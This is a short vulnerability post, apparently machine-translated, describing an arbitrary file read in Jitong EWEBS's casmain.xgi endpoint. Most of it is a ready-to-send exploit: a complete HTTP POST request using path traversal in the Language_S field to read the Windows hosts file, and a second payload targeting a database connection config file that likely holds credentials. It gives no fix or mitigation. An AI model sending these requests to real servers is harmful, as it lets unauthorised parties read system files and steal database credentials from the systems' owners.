Post

Jitong Ewebs Casmain Xgi Arbitrary File Reading Vulnerability

Jitong Ewebs Casmain Xgi Arbitrary File Reading Vulnerability

Jitong EWEBS casmain.xgi arbitrary file reading vulnerability

Vulnerability Description

Jitong EWEBS casmain.xgi arbitrary file reading vulnerability, where attackers can read any file through the vulnerability

Vulnerability Impact

Jitong EWEBS

Network surveying and mapping

Vulnerability reappears

The login page is as follows

img

The vulnerability request package is

POST /casmain.xgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN
Content-Length: 57

Language_S=../../../../windows/system32/drivers/etc/hosts

img

You can use testweb.php information to leak and read sensitive information

Language_S=../../Data/CONFIG/CasDbCnn.dat
This post is licensed under CC BY 4.0 by the author.